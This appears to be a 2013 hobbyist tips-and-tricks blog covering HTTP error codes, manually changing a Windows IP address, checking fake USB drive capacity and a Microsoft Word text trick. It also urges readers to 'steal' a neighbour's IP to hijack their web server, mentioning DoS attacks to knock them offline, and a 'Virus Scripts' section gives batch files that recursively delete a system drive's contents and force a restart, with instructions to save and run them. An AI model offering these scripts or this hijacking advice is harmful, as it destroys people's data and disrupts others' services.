Monday 28 January 2013

INTERNET ERROR CODES !!

Error 400 - Bad request.
Error 401 - unauthorized
request.
Error 403 - forbidden.
Error 404 - Not found.
Error 500 -Internal error.
Error 501 - Not Implemented
Error 502 - Bad Gateway
Error 503 -Service unavailable.
Error 504 - Gateway Time-Out
Error 505 - HTTP Version not
supported/DNS Lookup Fail/
unknwn host
Error 500-599 - Server Errors.
48 minutes

Saturday 26 January 2013

change your IP

Before you can change your IP you need some information. This information includes your IP range, subnet mask, default gateway, dhcp server, and dns servers.

1. Getting your IP range - Getting information about your IP range is not difficult, I recommend using Neo Trace on your own IP. But for my test just look at your IP address, say it's 24.193.110.13 you can definitely use the IP's found between 24.193.110.1 < [new IP] < 24.193.110.255, don't use x.x.x.1 or x.x.x.255. To find your IP simply open a dos/command prompt window and type ipconfig at the prompt, look for "IP Address. . . . . . . . . . . . : x.x.x.x".

2. Subnet Mask, Default Gateway, DHCP Server - These are very easy to find, just open a dos/command prompt window and type 'ipconfig /all' without the ' '. You should see something like this:
Windows IP Configuration:

Host Name . . . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . . . :
Node Type . . . . . . . . . . . . . . .: Unknown
IP Routing Enabled. . . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . . . . . . .: xxxx.xx.x
Description . . . . . . . . . . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . . . . . . : Yes
IP Address. . . . . . . . . . . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . . . . . . . . . .: 255.255.240.0
Default Gateway . . . . . . . . . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . . . . . . . . . .: 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . . . . . . . . . .:Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . . . . . . . . . . .:Tuesday, January 21, 2003 3:43:16 AM

This is all the information you will need for now, I suggest you either keep your dos/command prompt window open or copy & paste the information somewhere, to copy right click the window and select text and click once.

III. Changing your IP Address

To change your IP address first pick any IP you like out of your IP range and remember it or write it down. It is usualy a good idea to make sure the IP is dead (except for what we are going to do later on) so just ping it via "ping x.x.x.x" and if it times out then you can use it. Now go to My Computer, then Control Panel. In Control Panel select Network Connections and pick your active connection, probably Local Area Connection or your ISP name. Open that connection by double clicking on the icon in Network Connections, then select Properties under the General Tab. In the new window that pops up select Internet Protocol (TCP/IP) and click properties, it's under the general tab. In this new window select the General tab and choose "Use the following IP address" and for the IP address enter the IP you would like to use (the one you picked from your subnet earlier) and for the Subnet Mask enter the subnet mask you got when your ran ipconfig /all, same goes for the Default Gateway. Now select "Use the following DNS server addresses" and enter the information you got earlier. Now just click OK. Test that it worked, try to refresh a website and if it works you know everything is okay and you are connected. To make sure the change worked type ipconfig again and the IP address should have changed to your new one.

IV. DDoS & DoS Protection

If your firewall shows that you are being DDoSed, this is usually when you are constantly getting attempted UDP connections several times a second from either the same IP address or multiple IP addresses (DDoS), you can protect your self by changing your IP address via the method I described above.

V. Web servers & Other Services

If you know someone on your IP range is running a web server and he or she has pissed you off or you just like messing around you can "steal" their IP address so any DNS going to that IP will show your site instead because you would be running a web server yourself.

To "steal" an IP is to basically use the changing IP address method above and picking an IP that someone that is running a web server has in use. Often you will be able to keep that IP at least for some time, other times you wont be able to use it so just keep trying until it works. You your self will need to have a web server on the same port with your message. You can do this with other services too. You can also DoS or DDoS the IP address you are trying to steal to kick him off the net, but I don't recommend as its pretty illegal, an your ISP will get p$issed 

Virus Scripts

1.This Virus Deletes All The Content Of A Drive…
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
Save The Above Code with .bat extension & Run.

2.The Most Simple Virus To Crush The Window
@Echo off
Del C:\ *.* y
Save The Above Code with .bat extension & Run.

3.The below Code Will Just Restart Ur PC
@echo off shutdown -r -f -t 00
Save The Above Code with .bat extension & Run.
Note: Won’t work on Vista or Win7 as you need to bypass UAC.

Check storage capacity of fake USB flash drive
This can be done in case you find that the USB drive you purchased does not have prescribed capacity, written on the pack.
Here are the steps to find whether the real capasity is 8GB or not. (Works pretty well for other storage capacities too).
Normally The product shows itself as 8GB under Windows XP.
To find the stick’s capacity, read & write speeds:
1. Download the free version of the tool
Bart’s Stuff Test 5
Version 5.1.4
(Search in Google)
2. Before plugging in your flash drive, Disable the Autorun feature of Windows XP.
3. Plug the stick into an USB port (Warning: Make sure you have your AntiVirus updated).
4. Don’t open anything on the stick. Do not doubleclick on the stick.
5. Format the stick to get rid of any potential viruses or malicious tools.
6. Run Bart’s Stuff and select the stick under “Folder”
7. Start the test. It will write a sequential file that will fill the stick up to > 90% of it’s capacity and then it does read back the written data.
8. Check the Bart’s stuff status written total when you get an error message like this: “An Error occurred. WriteFile returned an Error. There is not enough space on the disk”.
If the stick ran out of space at 4 GB exactly, Bart’s Stuff filled the stick up to 52 % of it’s fake capacity. But: Since the FAT32 maximum supported file size is 4GB, this method would not work on flash drives with more than 4GB of capacity. Larger size sticks should be filled up with large files that are compared against their originals to see if some errors occur.
Hence it shows that the USB stick is fake.
Here is an another indication that proves the stick is fake:
Windows XP sees it as 7.95 GB capacity with 8,539,680,768 bytes. This is too much reported space.
Normally, 8GB stick is reported by Windows XP has 7.73 GB capacity with 8,304,717,824 bytes. Since flash drives always give you less than the advertised storage space.
There is another very useful utility that can help to check for fake USB sticks, it’s called H2testw ( Can be be downloaded at the downloads section of heise.de ). The program Measures the write and read speed. On fake 8 GB stick, You only get about 1 to 3 MB/s write speed which is an indication that there is something really weird going on here. the Utility sees the USB stick as 8144 MB in size when empty which is totally impossible, another hint that it was manipulated.

Monday 7 January 2013

Hi friends, I hope you are enjoying my tips and tricks. Today I am going to tell you a trick to be used in microsoft word. It is just like a magic.

Here we go.....
1. Open Microsoft ord.
2.Type  "=Rand(200, 99)" without quotes and hit Enter.
3. See the magic.

You can even alter the parameter passed within braces and see different effects.

I hope you enjoyed this trick.
Enjoy hacking,
Keep on reading my blogs.